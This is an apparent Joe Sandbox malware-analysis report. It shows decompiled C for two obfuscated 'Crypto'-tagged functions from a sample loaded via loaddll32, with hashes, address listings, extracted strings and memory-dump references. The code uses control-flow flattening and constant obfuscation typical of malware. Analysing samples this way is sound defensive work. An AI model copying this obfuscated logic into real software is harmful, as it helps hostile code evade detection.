API String ID: 0-2449995950
Opcode ID: a34f7198d8cfe087e5725c062c75e3d02e424475925d1f5e6ffd0d9c0c06ab04
Instruction ID: fd4211826eda152932f0e6a39c7e3e210da88f5b13c9a1fe23dea148914a49f3
Opcode Fuzzy Hash: a34f7198d8cfe087e5725c062c75e3d02e424475925d1f5e6ffd0d9c0c06ab04
Instruction Fuzzy Hash: 2F22117150C3809FD3A8CF65D58AA9BBBF2FBC4358F10891DE29986260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0087E955, Relevance: 11.6, Strings: 9, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0087E955() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				unsigned int _v708;
				signed int _t316;
				void* _t319;
				intOrPtr _t320;
				intOrPtr _t323;
				intOrPtr _t328;
				void* _t331;
				void* _t334;
				void* _t335;
				char _t342;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				unsigned int* _t372;

				_t372 =  &_v708;
				_v576 = 0xda0c08;
				_v576 = _v576 + 0xffff47d7;
				_t335 = 0x67615db;
				_v576 = _v576 ^ 0x00d953de;
				_v616 = 0x1aa62a;
				_v616 = _v616 ^ 0x887273cb;
				_v616 = _v616 ^ 0x8868d4e1;
				_v696 = 0x6cc5ff;
				_v696 = _v696 + 0xffff0f33;
				_v696 = _v696 + 0xffffebff;
				_v696 = _v696 + 0xffff9323;
				_v696 = _v696 ^ 0x006b5457;
				_v620 = 0xd441f6;
				_v620 = _v620 >> 2;
				_v620 = _v620 ^ 0x0035107d;
				_v668 = 0xe6e8c4;
				_v668 = _v668 + 0xffff0cc3;
				_v668 = _v668 | 0x11364c4e;
				_v668 = _v668 ^ 0x11fae4e7;
				_v664 = 0xedeede;
				_v664 = _v664 + 0x8dc4;
				_v664 = _v664 >> 0xb;
				_v664 = _v664 ^ 0x00096569;
				_v644 = 0x7bf23b;
				_v644 = _v644 + 0x7679;
				_v644 = _v644 << 2;
				_v644 = _v644 ^ 0x01f0e7c7;
				_v588 = 0xd55e4f;
				_v588 = _v588 >> 8;
				_v588 = _v588 ^ 0x000a9525;
				_v648 = 0x4b711e;
				_v648 = _v648 + 0xffff1f62;
				_v648 = _v648 ^ 0xa93f12d6;
				_v648 = _v648 ^ 0xa9763896;
				_v584 = 0xdb5f0a;
				_v584 = _v584 * 0x19;
				_t334 = 0;
				_v584 = _v584 ^ 0x156e4d85;
				_v608 = 0x3263c9;
				_v608 = _v608 + 0xe60;
				_v608 = _v608 ^ 0x0036f835;
				_v640 = 0x3b5ffd;
				_t365 = 0x46;
				_v640 = _v640 * 5;
				_v640 = _v640 / _t365;
				_v640 = _v640 ^ 0x000ce458;
				_v708 = 0xb95ed6;
				_t366 = 0x5a;
				_v708 = _v708 / _t366;
				_v708 = _v708 ^ 0x64dff63e;
				_v708 = _v708 >> 0x10;
				_v708 = _v708 ^ 0x000970e9;
				_v672 = 0xda5c0b;
				_v672 = _v672 >> 5;
				_v672 = _v672 * 0x6e;
				_v672 = _v672 ^ 0x02ed68c8;
				_v600 = 0xb0c206;
				_v600 = _v600 + 0x21e9;
				_v600 = _v600 ^ 0x00b07205;
				_v684 = 0x1b8021;
				_v684 = _v684 << 2;
				_v684 = _v684 >> 0xb;
				_v684 = _v684 << 8;
				_v684 = _v684 ^ 0x0007a69d;
				_v700 = 0x716346;
				_v700 = _v700 >> 0xe;
				_v700 = _v700 << 9;
				_v700 = _v700 | 0x54417142;
				_v700 = _v700 ^ 0x544d1ccb;
				_v704 = 0x83733f;
				_v704 = _v704 << 0xe;
				_v704 = _v704 << 1;
				_t367 = 0xf;
				_v704 = _v704 / _t367;
				_v704 = _v704 ^ 0x0c51ca4a;
				_v676 = 0x255e7;
				_v676 = _v676 ^ 0x45c0186f;
				_v676 = _v676 ^ 0x0e243a79;
				_v676 = _v676 ^ 0x4be8c079;
				_v652 = 0xc8a42f;
				_t368 = 0x3b;
				_v652 = _v652 * 0x1e;
				_v652 = _v652 + 0xffffdb98;
				_v652 = _v652 ^ 0x178e8932;
				_v660 = 0x399dd9;
				_v660 = _v660 << 0x10;
				_v660 = _v660 << 1;
				_v660 = _v660 ^ 0x3bb87d79;
				_v596 = 0x4a6152;
				_v596 = _v596 + 0xeb3a;
				_v596 = _v596 ^ 0x00451e15;
				_v604 = 0x1a296a;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x000806f7;
				_v628 = 0x8a6a9a;
				_v628 = _v628 << 0xc;
				_v628 = _v628 / _t368;
				_v628 = _v628 ^ 0x02ddb0c3;
				_v612 = 0x56dff1;
				_v612 = _v612 << 4;
				_v612 = _v612 ^ 0x056559b2;
				_v592 = 0xb835f;
				_v592 = _v592 ^ 0x56373199;
				_v592 = _v592 ^ 0x563f1b5a;
				_v636 = 0x2555d1;
				_v636 = _v636 + 0xffff7c76;
				_v636 = _v636 | 0x931e680c;
				_v636 = _v636 ^ 0x933edc2a;
				_v688 = 0x729e7a;
				_v688 = _v688 + 0x52a9;
				_v688 = _v688 << 6;
				_v688 = _v688 ^ 0x08219d26;
				_v688 = _v688 ^ 0x149a839d;
				_v656 = 0xbb5b70;
				_v656 = _v656 + 0x6c7b;
				_v656 = _v656 | 0x24d7418a;
				_v656 = _v656 ^ 0x24f0c3f7;
				_v692 = 0xac0342;
				_v692 = _v692 + 0x6c81;
				_v692 = _v692 >> 0xd;
				_v692 = _v692 + 0xbde1;
				_v692 = _v692 ^ 0x00055202;
				_v632 = 0x18da0d;
				_t369 = 0x57;
				_v632 = _v632 * 0x5d;
				_v632 = _v632 + 0xffff6f25;
				_v632 = _v632 ^ 0x090e1c26;
				_v580 = 0xa5e89c;
				_v580 = _v580 / _t369;
				_v580 = _v580 ^ 0x000ce540;
				_v680 = 0x842c1c;
				_v680 = _v680 << 5;
				_v680 = _v680 ^ 0x259e7cb4;
				_v680 = _v680 + 0xffff46bd;
				_v680 = _v680 ^ 0x3515c03d;
				_v624 = 0x501187;
				_v624 = _v624 ^ 0x46ba0327;
				_v624 = _v624 ^ 0x46eeb458;
				_t364 = _v624;
				do {
					while(_t335 != 0x2d5e71a) {
						if(_t335 == 0x67615db) {
							_t335 = 0xf75ce9f;
							continue;
						} else {
							if(_t335 == 0x7a053ff) {
								E00881538(_v680, _v624, _t364);
							} else {
								if(_t335 == 0x7a51f41) {
									_push(_v640);
									_push(_v608);
									_push(_v584);
									_t319 = E0087E1F8(0x861000, _v648, __eflags);
									_t320 =  *0x886214; // 0x0
									_t323 =  *0x886214; // 0x0
									E00882D0A(_v672, __eflags, _t323 + 0x23c, _v600, _v684, _v700, 0x861000,  &_v524, _t320 + 0x34, _t319);
									E0087FECB(_t319, _v704, _v676, _v652, _v660);
									_t372 =  &(_t372[0xe]);
									_t335 = 0x2d5e71a;
									continue;
								} else {
									if(_t335 == 0xa48fbff) {
										_v572 = _v572 - E00865477(_t335);
										_t335 = 0x7a51f41;
										asm("sbb [esp+0x9c], edx");
										continue;
									} else {
										if(_t335 == 0xd7f7f02) {
											_t328 = _v568;
											_t342 = _v572;
											_v560 = _t328;
											_v552 = _t328;
											_v544 = _t328;
											_v536 = _t328;
											_v532 = _v620;
											_v564 = _t342;
											_v556 = _t342;
											_v548 = _t342;
											_v540 = _t342;
											_t331 = E008844FF(_v656, _v692, _t342, _v632, _t342, _v580,  &_v564, _t364);
											_t372 =  &(_t372[6]);
											__eflags = _t331;
											_t334 =  !=  ? 1 : _t334;
											_t335 = 0x7a053ff;
											continue;
										} else {
											if(_t335 != 0xf75ce9f) {
												goto L16;
											} else {
												E0087CA1F(_v668, _v664,  &_v572, _v644, _v588);
												_t372 =  &(_t372[3]);
												_t335 = 0xa48fbff;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t334;
					}
					_t316 = E008845CA( &_v524, _v596, _t335, _t335, _v604, _v628, _v612, _v616, _v592, _v636, 0, _v688, _v696, _v576);
					_t364 = _t316;
					_t372 =  &(_t372[0xc]);
					__eflags = _t316 - 0xffffffff;
					if(__eflags == 0) {
						_t335 = 0xc46350e;
						goto L16;
					} else {
						_t335 = 0xd7f7f02;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t335 - 0xc46350e;
				} while (__eflags != 0);
				goto L19;
			}

0x0087e955
0x0087e95f
0x0087e96c
0x0087e977
0x0087e97c
0x0087e987
0x0087e98f
0x0087e997
0x0087e99f
0x0087e9a7
0x0087e9af
0x0087e9b7
0x0087e9bf
0x0087e9c7
0x0087e9cf
0x0087e9d4
0x0087e9dc
0x0087e9e4
0x0087e9ec
0x0087e9f4
0x0087e9fc
0x0087ea04
0x0087ea0c
0x0087ea11
0x0087ea19
0x0087ea21
0x0087ea29
0x0087ea2e
0x0087ea36
0x0087ea41
0x0087ea49
0x0087ea54
0x0087ea5c
0x0087ea64
0x0087ea6c
0x0087ea74
0x0087ea87
0x0087ea8e
0x0087ea90
0x0087ea9b
0x0087eaa3
0x0087eaab
0x0087eab3
0x0087eac2
0x0087eac5
0x0087ead1
0x0087ead5
0x0087eadd
0x0087eae9
0x0087eaec
0x0087eaf0
0x0087eaf8
0x0087eafd
0x0087eb05
0x0087eb0d
0x0087eb17
0x0087eb1b
0x0087eb23
0x0087eb2b
0x0087eb33
0x0087eb3b
0x0087eb43
0x0087eb48
0x0087eb4d
0x0087eb52
0x0087eb5a
0x0087eb62
0x0087eb67
0x0087eb6e
0x0087eb76
0x0087eb7e
0x0087eb86
0x0087eb8b
0x0087eb95
0x0087eb9a
0x0087eba0
0x0087eba8
0x0087ebb0
0x0087ebb8
0x0087ebc0
0x0087ebc8
0x0087ebd5
0x0087ebd8
0x0087ebdc
0x0087ebe4
0x0087ebec
0x0087ebf4
0x0087ebf9
0x0087ebfd
0x0087ec05
0x0087ec10
0x0087ec1b
0x0087ec26
0x0087ec2e
0x0087ec33
0x0087ec3b
0x0087ec43
0x0087ec50
0x0087ec54
0x0087ec5c
0x0087ec64
0x0087ec69
0x0087ec71
0x0087ec7c
0x0087ec87
0x0087ec92
0x0087ec9a
0x0087eca2
0x0087ecaa
0x0087ecb2
0x0087ecba
0x0087ecc2
0x0087ecc7
0x0087eccf
0x0087ecd7
0x0087ecdf
0x0087ece7
0x0087ecef
0x0087ecf7
0x0087ecff
0x0087ed07
0x0087ed0c
0x0087ed14
0x0087ed1c
0x0087ed29
0x0087ed2a
0x0087ed2e
0x0087ed36
0x0087ed3e
0x0087ed52
0x0087ed59
0x0087ed64
0x0087ed6c
0x0087ed71
0x0087ed79
0x0087ed86
0x0087ed8e
0x0087ed96
0x0087ed9e
0x0087eda6
0x0087edaa
0x0087edaa
0x0087edbc
0x0087ef46
0x00000000
0x0087edc2
0x0087edc8
0x0087efca
0x0087edce
0x0087edd4
0x0087eec6
0x0087eecf
0x0087eed3
0x0087eede
0x0087eee8
0x0087ef0a
0x0087ef1d
0x0087ef34
0x0087ef39
0x0087ef3c
0x00000000
0x0087edda
0x0087ede0
0x0087eeae
0x0087eeb5
0x0087eeba
0x00000000
0x0087ede6
0x0087ede8
0x0087ee20
0x0087ee27
0x0087ee2e
0x0087ee35
0x0087ee3c
0x0087ee43
0x0087ee4f
0x0087ee65
0x0087ee75
0x0087ee7c
0x0087ee83
0x0087ee8f
0x0087ee96
0x0087ee9a
0x0087ee9c
0x0087ee9f
0x00000000
0x0087edea
0x0087edf0
0x00000000
0x0087edf6
0x0087ee11
0x0087ee16
0x0087ee19
0x00000000
0x0087ee19
0x0087edf0
0x0087ede8
0x0087ede0
0x0087edd4
0x0087edc8
0x0087efd3
0x0087efdc
0x0087efdc
0x0087ef98
0x0087ef9d
0x0087ef9f
0x0087efa2
0x0087efa5
0x0087efae
0x00000000
0x0087efa7
0x0087efa7
0x00000000
0x0087efa7
0x00000000
0x0087efb3
0x0087efb3
0x0087efb3
0x00000000

Strings

ie, xrefs: 0087EA11
WTk, xrefs: 0087E9BF
p, xrefs: 0087EAFD
:, xrefs: 0087EC10
{l, xrefs: 0087ECDF
BqAT, xrefs: 0087EB6E
RaJ, xrefs: 0087EC05
yv, xrefs: 0087EA21
!, xrefs: 0087EB2B

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: :$BqAT$RaJ$WTk$ie$yv${l$!$p
API String ID: 0-4263964199
Opcode ID: d25bb995963489fcbdd5081aa654a8b0de864a362242e274439a84d4355098a4
Instruction ID: 27590a5bf6406ce02c4a9b9dbb9a3c4df33bdf83422f78cf94af7e9a00ddf734
Opcode Fuzzy Hash: d25bb995963489fcbdd5081aa654a8b0de864a362242e274439a84d4355098a4
Instruction Fuzzy Hash: 2CF110724097808FC3A8CF65C54AA5BFBE1FBC4758F50891DF2AA86260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 008836AA, Relevance: 10.4, Strings: 8, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E008836AA() {
				signed int _t373;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				intOrPtr _t383;
				signed int _t385;
				signed int _t387;
				void* _t392;
				signed int _t435;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t449;
				signed int* _t453;

				 *_t453 = 0x507140;
				_t392 = 0xe12044f;
				_t453[4] =  *_t453 * 0x71;
				_t438 = 0x6b;
				_t453[5] = _t453[4] / _t438;
				_t453[5] = _t453[5] >> 9;
				_t453[5] = _t453[5] ^ 0x00002a7b;
				_t453[9] = 0x87b94d;
				_t453[9] = _t453[9] + 0xffff92a0;
				_t453[9] = _t453[9] + 0x79ac;
				_t453[9] = _t453[9] >> 3;
				_t453[9] = _t453[9] ^ 0x0010f8b2;
				_t453[0x18] = 0x43735f;
				_t453[0x18] = _t453[0x18] << 0xa;
				_t453[0x18] = _t453[0x18] + 0xffff408e;
				_t453[0x18] = _t453[0x18] ^ 0x0dccbc8d;
				_t453[0x19] = 0x2e99ff;
				_t439 = 0x48;
				_push("true");
				_t453[0x19] = _t453[0x19] / _t439;
				_t453[0x19] = _t453[0x19] | 0xc1c83132;
				_t453[0x19] = _t453[0x19] ^ 0xc1c60879;
				_t453[0xc] = 0xdcf188;
				_pop(_t440);
				_t453[0x2b] = _t453[0x2b] & 0x00000000;
				_t453[0xc] = _t453[0xc] * 0x48;
				_t453[0xc] = _t453[0xc] + 0xb8d0;
				_t453[0xc] = _t453[0xc] + 0xe79e;
				_t453[0xc] = _t453[0xc] ^ 0x3e220605;
				_t453[0x1f] = 0x3f10b8;
				_t453[0x1f] = _t453[0x1f] | 0x536a71f8;
				_t453[0x1f] = _t453[0x1f] ^ 0x537d907f;
				_t453[0x17] = 0xda4ece;
				_t453[0x17] = _t453[0x17] / _t440;
				_t453[0x17] = _t453[0x17] + 0xffff6c3f;
				_t453[0x17] = _t453[0x17] ^ 0x000916d6;
				_t453[0x21] = 0x81e16;
				_t441 = 0x1f;
				_t453[0x20] = _t453[0x21] * 0x37;
				_t453[0x20] = _t453[0x20] ^ 0x01bbd9e8;
				_t453[0x12] = 0x23ff7a;
				_t453[0x12] = _t453[0x12] + 0xda88;
				_t453[0x12] = _t453[0x12] << 9;
				_t453[0x12] = _t453[0x12] ^ 0x49b967a0;
				_t453[0x25] = 0xa4ae1d;
				_t453[0x25] = _t453[0x25] + 0xffff1e93;
				_t453[0x25] = _t453[0x25] ^ 0x00a3b794;
				_t453[0x1a] = 0xc58380;
				_t453[0x1a] = _t453[0x1a] + 0xffff63f4;
				_t453[0x1a] = _t453[0x1a] ^ 0x00c360dd;
				_t453[0xa] = 0x315c71;
				_t453[0xa] = _t453[0xa] * 0x2d;
				_t453[0xa] = _t453[0xa] << 4;
				_t453[0xa] = _t453[0xa] >> 9;
				_t453[0xa] = _t453[0xa] ^ 0x004c0641;
				_t453[0x26] = 0xfaa693;
				_t453[0x26] = _t453[0x26] / _t441;
				_t453[0x26] = _t453[0x26] ^ 0x0006da62;
				_t453[6] = 0x2e22d8;
				_t453[6] = _t453[6] + 0x1da5;
				_t453[6] = _t453[6] ^ 0x7a3436a8;
				_t453[6] = _t453[6] + 0x3380;
				_t453[6] = _t453[6] ^ 0x7a1ea83a;
				_t453[0xe] = 0x225cf9;
				_t442 = 0x46;
				_t453[0xf] = _t453[0xe] * 0xd;
				_t453[0xf] = _t453[0xf] / _t442;
				_t453[0xf] = _t453[0xf] ^ 0x000c9e58;
				_t453[0x1e] = 0xb4cd70;
				_t443 = 5;
				_t453[0x1e] = _t453[0x1e] / _t443;
				_t453[0x1e] = _t453[0x1e] ^ 0x00223e8b;
				_t453[0x25] = 0x175145;
				_t453[0x25] = _t453[0x25] + 0xffffbe60;
				_t453[0x25] = _t453[0x25] ^ 0x0015ea4b;
				_t453[0x16] = 0x9a90a6;
				_t453[0x16] = _t453[0x16] >> 1;
				_t453[0x16] = _t453[0x16] | 0x97e6917e;
				_t453[0x16] = _t453[0x16] ^ 0x97edbee9;
				_t453[0x14] = 0x10553c;
				_t453[0x14] = _t453[0x14] | 0x69ed7b68;
				_t453[0x14] = _t453[0x14] ^ 0x8ccf5101;
				_t453[0x14] = _t453[0x14] ^ 0xe532736d;
				_t453[0x12] = 0x5e103c;
				_t453[0x12] = _t453[0x12] ^ 0xd5bdf2ed;
				_t453[0x12] = _t453[0x12] | 0x536bb37e;
				_t453[0x12] = _t453[0x12] ^ 0xd7e39e3a;
				_t453[6] = 0xad714c;
				_t453[6] = _t453[6] << 5;
				_t444 = 0x5a;
				_t453[6] = _t453[6] * 0x77;
				_t453[6] = _t453[6] | 0x8fd7f967;
				_t453[6] = _t453[6] ^ 0x9ffa7b5b;
				_t453[0x29] = 0x969a62;
				_t453[0x29] = _t453[0x29] + 0xffff3747;
				_t453[0x29] = _t453[0x29] ^ 0x009bad24;
				_t453[0x22] = 0xa29aa2;
				_t453[0x22] = _t453[0x22] + 0xffff9bca;
				_t453[0x22] = _t453[0x22] ^ 0x00a8d7f4;
				_t453[0x28] = 0x5c718d;
				_t453[0x28] = _t453[0x28] / _t444;
				_t453[0x28] = _t453[0x28] ^ 0x000e04a7;
				_t453[0x15] = 0x6aed70;
				_t453[0x15] = _t453[0x15] | 0x24270adc;
				_t453[0x15] = _t453[0x15] ^ 0x00a30154;
				_t453[0x15] = _t453[0x15] ^ 0x24c5236d;
				_t453[0x20] = 0x9ad963;
				_t453[0x20] = _t453[0x20] ^ 0x804e7f4a;
				_t453[0x20] = _t453[0x20] ^ 0x80d9ea50;
				_t453[0x1c] = 0xc68496;
				_t453[0x1c] = _t453[0x1c] >> 0x10;
				_t453[0x1c] = _t453[0x1c] ^ 0x0003f168;
				_t453[0x24] = 0x7e4214;
				_t453[0x24] = _t453[0x24] << 4;
				_t453[0x24] = _t453[0x24] ^ 0x07e08805;
				_t453[0x11] = 0x92d404;
				_t445 = 0x3c;
				_t453[0x10] = _t453[0x11] / _t445;
				_t453[0x10] = _t453[0x10] + 0x2a76;
				_t453[0x10] = _t453[0x10] ^ 0x0004ebe7;
				_t453[9] = 0xe8ea05;
				_t453[9] = _t453[9] + 0xffffd5a4;
				_t453[9] = _t453[9] << 7;
				_t453[9] = _t453[9] + 0xffff1c2a;
				_t453[9] = _t453[9] ^ 0x7454948f;
				_t453[7] = 0x853308;
				_t453[7] = _t453[7] + 0xffff5128;
				_t453[7] = _t453[7] + 0x9f37;
				_t453[7] = _t453[7] | 0x54c51839;
				_t453[7] = _t453[7] ^ 0x54ca1cec;
				_t453[0x1c] = 0x270edd;
				_t453[0x1c] = _t453[0x1c] + 0x9c5c;
				_t453[0x1c] = _t453[0x1c] ^ 0x00251ad9;
				_t453[0x22] = 0x4b1e01;
				_t453[0x22] = _t453[0x22] >> 0xa;
				_t453[0x22] = _t453[0x22] ^ 0x00014be5;
				_t453[0xf] = 0x1097d4;
				_t453[0xf] = _t453[0xf] ^ 0x70356bb9;
				_t453[0xf] = _t453[0xf] << 7;
				_t453[0xf] = _t453[0xf] ^ 0x12f26116;
				_t453[0xd] = 0x3e61;
				_t453[0xd] = _t453[0xd] ^ 0x4940d563;
				_t453[0xd] = _t453[0xd] << 5;
				_t453[0xd] = _t453[0xd] ^ 0x28127601;
				_t453[0x19] = 0xea3040;
				_t265 =  &(_t453[0x19]); // 0xea3040
				_t446 = 0x24;
				_t390 = _t453[0x2a];
				_t453[0x1a] =  *_t265 * 0x3e;
				_t435 = _t453[0x2a];
				_t453[0x1a] = _t453[0x1a] / _t446;
				_t453[0x1a] = _t453[0x1a] ^ 0x01901c81;
				_t453[0xd] = 0xdd1c82;
				_t447 = 0x39;
				_t451 = _t453[0x29];
				_t453[0xc] = _t453[0xd] * 0x64;
				_t453[0xc] = _t453[0xc] / _t447;
				_t453[0xc] = _t453[0xc] ^ 0x01838ff7;
				L1:
				while(1) {
					while(_t392 != 0x17dddcb) {
						if(_t392 == 0x8a29766) {
							E00882B09(_t453[0x24], _t435, _t453[0x10], _t453[0xd]);
							_t392 = 0xcdeb26f;
							continue;
						} else {
							if(_t392 == 0xac116a6) {
								E00880DB1(_t453[0x1b],  &(_t453[0x2d]), __eflags, _t453[0xd], _t392, _t453[0x1e]);
								_t373 = E008709DD(_t453[0x1b],  &(_t453[0x30]), _t453[0x24], _t453[0x15]);
								_t451 = _t373;
								_t453 =  &(_t453[5]);
								_t392 = 0xf1147e4;
								 *((short*)(_t373 - 2)) = 0;
								continue;
							} else {
								if(_t392 == 0xcdeb26f) {
									_t337 =  &(_t453[0x19]); // 0xea3040
									E00881538( *_t337, _t453[0xc], _t390);
								} else {
									if(_t392 == 0xe12044f) {
										_t392 = 0xac116a6;
										continue;
									} else {
										if(_t392 == 0xe899f05) {
											_t378 = E0087E406(_t453[0x11], _t453[0x33], _t392, _t453[0x2b], _t453[0x30], _t435, _t453[0xb], _t392,  &(_t453[0x2e]), _t453[0x2d], _t453[0x17], _t453[0x21], _t392, _t390);
											_t453 =  &(_t453[0xc]);
											__eflags = _t378;
											if(_t378 == 0) {
												L17:
												_t379 = _t453[0x2a];
											} else {
												_t449 = _t435;
												while(1) {
													__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
													if( *((intOrPtr*)(_t449 + 4)) != 4) {
														goto L14;
													}
													L13:
													_t387 = E0088061D(_t453[0x1d], _t451, _t449 + 0xc, _t453[0x24], _t453[0x10]);
													_t453 =  &(_t453[3]);
													__eflags = _t387;
													if(_t387 == 0) {
														_t379 = 1;
														_t453[0x2a] = 1;
													} else {
														goto L14;
													}
													goto L18;
													L14:
													_t385 =  *_t449;
													__eflags = _t385;
													if(_t385 == 0) {
														goto L17;
													} else {
														_t449 = _t449 + _t385;
														__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
														if( *((intOrPtr*)(_t449 + 4)) != 4) {
															goto L14;
														}
													}
													goto L18;
												}
											}
											L18:
											__eflags = _t379;
											if(__eflags == 0) {
												L20:
												_t392 = 0xe899f05;
											} else {
												_t383 =  *0x886208; // 0x0
												E008827BC(_t453[0xa], _t453[8],  *((intOrPtr*)(_t383 + 0x18)), _t453[0x1c]);
												_t392 = 0x8a29766;
											}
											continue;
											L30:
										} else {
											if(_t392 != 0xf1147e4) {
												L26:
												__eflags = _t392 - 0x2906cf2;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t382 = E008845CA( &(_t453[0x38]), _t453[0x2f], _t392, _t392, _t453[0x23], _t453[0x12], _t453[0x2d], 1, _t453[0xb], _t453[0x12], 0x2000000, _t453[0x1f], _t453[0x18], _t453[8] | 0x00000006);
												_t390 = _t382;
												_t453 =  &(_t453[0xc]);
												if(_t382 != 0xffffffff) {
													_t392 = 0x17dddcb;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags = 0;
						return 0;
						goto L30;
					}
					_push(_t392);
					_push(_t392);
					_t453[0x2c] = 0x1000;
					_t435 = E0086C5D8(0x1000);
					_t453 =  &(_t453[3]);
					__eflags = _t435;
					if(__eflags != 0) {
						goto L20;
					} else {
						_t392 = 0xcdeb26f;
						goto L26;
					}
					goto L29;
				}
			}

0x008836b0
0x008836bd
0x008836c6
0x008836d0
0x008836d5
0x008836db
0x008836e0
0x008836e8
0x008836f0
0x008836f8
0x00883700
0x00883705
0x0088370d
0x00883715
0x0088371a
0x00883722
0x0088372a
0x00883736
0x00883739
0x0088373b
0x00883741
0x00883749
0x00883751
0x0088375e
0x00883761
0x00883769
0x0088376d
0x00883775
0x0088377d
0x00883785
0x0088378d
0x00883795
0x0088379d
0x008837ad
0x008837b1
0x008837b9
0x008837c1
0x008837d4
0x008837d5
0x008837dc
0x008837e7
0x008837ef
0x008837f7
0x008837fc
0x00883804
0x0088380f
0x0088381a
0x00883825
0x0088382d
0x00883835
0x0088383d
0x0088384a
0x0088384e
0x00883853
0x00883858
0x00883860
0x00883874
0x0088387b
0x00883886
0x00883890
0x00883898
0x008838a0
0x008838a8
0x008838b0
0x008838bf
0x008838c2
0x008838ce
0x008838d2
0x008838da
0x008838e6
0x008838eb
0x008838f1
0x008838f9
0x00883904
0x0088390f
0x0088391a
0x00883922
0x00883926
0x0088392e
0x00883936
0x0088393e
0x00883946
0x0088394e
0x00883956
0x0088395e
0x00883966
0x0088396e
0x00883976
0x0088397e
0x00883988
0x0088398b
0x0088398f
0x00883997
0x0088399f
0x008839aa
0x008839b5
0x008839c0
0x008839cb
0x008839d6
0x008839e1
0x008839f7
0x008839fe
0x00883a09
0x00883a11
0x00883a19
0x00883a21
0x00883a29
0x00883a34
0x00883a3f
0x00883a4a
0x00883a52
0x00883a57
0x00883a5f
0x00883a6a
0x00883a72
0x00883a7d
0x00883a89
0x00883a8c
0x00883a90
0x00883a98
0x00883aa0
0x00883aa8
0x00883ab2
0x00883ab7
0x00883abf
0x00883ac7
0x00883acf
0x00883ad7
0x00883adf
0x00883ae7
0x00883aef
0x00883af7
0x00883aff
0x00883b07
0x00883b12
0x00883b1a
0x00883b25
0x00883b2d
0x00883b35
0x00883b3a
0x00883b42
0x00883b4a
0x00883b52
0x00883b57
0x00883b5f
0x00883b67
0x00883b6e
0x00883b71
0x00883b78
0x00883b84
0x00883b8b
0x00883b8f
0x00883b97
0x00883ba4
0x00883ba5
0x00883bac
0x00883bb6
0x00883bba
0x00000000
0x00883bc2
0x00883bc2
0x00883bd4
0x00883d95
0x00883d9c
0x00000000
0x00883bda
0x00883be0
0x00883d4f
0x00883d6a
0x00883d6f
0x00883d71
0x00883d76
0x00883d7b
0x00000000
0x00883be6
0x00883bec
0x00883df4
0x00883df9
0x00883bf2
0x00883bf8
0x00883d31
0x00000000
0x00883bfe
0x00883c04
0x00883cac
0x00883cb1
0x00883cb4
0x00883cb6
0x00883cf7
0x00883cf7
0x00883cb8
0x00883cb8
0x00883cba
0x00883cba
0x00883cbe
0x00000000
0x00000000
0x00883cc0
0x00883cd5
0x00883cda
0x00883cdd
0x00883cdf
0x00883ced
0x00883cee
0x00000000
0x00000000
0x00000000
0x00000000
0x00883ce1
0x00883ce1
0x00883ce3
0x00883ce5
0x00000000
0x00883ce7
0x00883ce7
0x00883cba
0x00883cbe
0x00000000
0x00000000
0x00883cbe
0x00000000
0x00883ce5
0x00883cba
0x00883cfe
0x00883cfe
0x00883d00
0x00883d27
0x00883d27
0x00883d02
0x00883d06
0x00883d16
0x00883d1d
0x00883d1d
0x00000000
0x00000000
0x00883c06
0x00883c0c
0x00883de2
0x00883de2
0x00883de8
0x00000000
0x00000000
0x00883dee
0x00883c12
0x00883c53
0x00883c58
0x00883c5a
0x00883c60
0x00883c66
0x00000000
0x00883c66
0x00883c60
0x00883c0c
0x00883c04
0x00883bf8
0x00883bec
0x00883be0
0x00883dff
0x00883e02
0x00883e0b
0x00000000
0x00883e0b
0x00883db9
0x00883dba
0x00883dc0
0x00883dd0
0x00883dd2
0x00883dd5
0x00883dd7
0x00000000
0x00883ddd
0x00883ddd
0x00000000
0x00883ddd
0x00000000
0x00883dd7

Strings

_sC, xrefs: 0088370D
pj, xrefs: 00883A09
ms2, xrefs: 0088394E
q\1, xrefs: 0088383D
@0, xrefs: 00883B67
a>, xrefs: 00883B42
{*, xrefs: 008836E0
v*, xrefs: 00883A90

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

